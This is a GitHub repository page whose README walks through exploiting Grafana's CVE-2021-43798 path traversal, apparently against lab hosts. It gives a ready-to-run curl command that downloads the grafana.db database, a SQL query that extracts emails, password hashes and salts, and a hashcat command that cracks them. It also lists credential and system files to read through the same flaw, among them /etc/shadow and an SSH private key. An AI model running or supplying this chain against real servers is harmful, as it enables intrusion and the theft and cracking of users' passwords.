Skip to content

persees/grafana_exploits

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

decoder.py

decoder.py

 
 

hash

hash

 
 

hashes.txt

hashes.txt

 
 

Repository files navigation

Chain CVE-2021-43798 with grafana.db files

  1. Get the database using CVE-2021-43798 curl 'http://10.10.77.156:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' --path-as-is --output grafana.db

  2. Query the database and extract email, password and salt select email,password,salt from user;

  3. Save that output to a file (look at hashes.txt)

  4. Run decoder.py script python3 decoder.py > hash

  5. Run hashcat to crack the passwords hashcat -m 10900 hash /usr/share/wordlists/rockyou.txt

Interesting files to analyze if the above does not work

/etc/passwd
/etc/shadow
/etc/hostname
/etc/grafana/grafana.ini
/home/grafana/.ssh/id_rsa
/var/lib/grafana/grafana.db
-> curl -o grafana.db --path-as-is http://10.9.49.222:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db

Sources

About

A repository with some scripts and ways of thinking to get code execution on Grafana

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages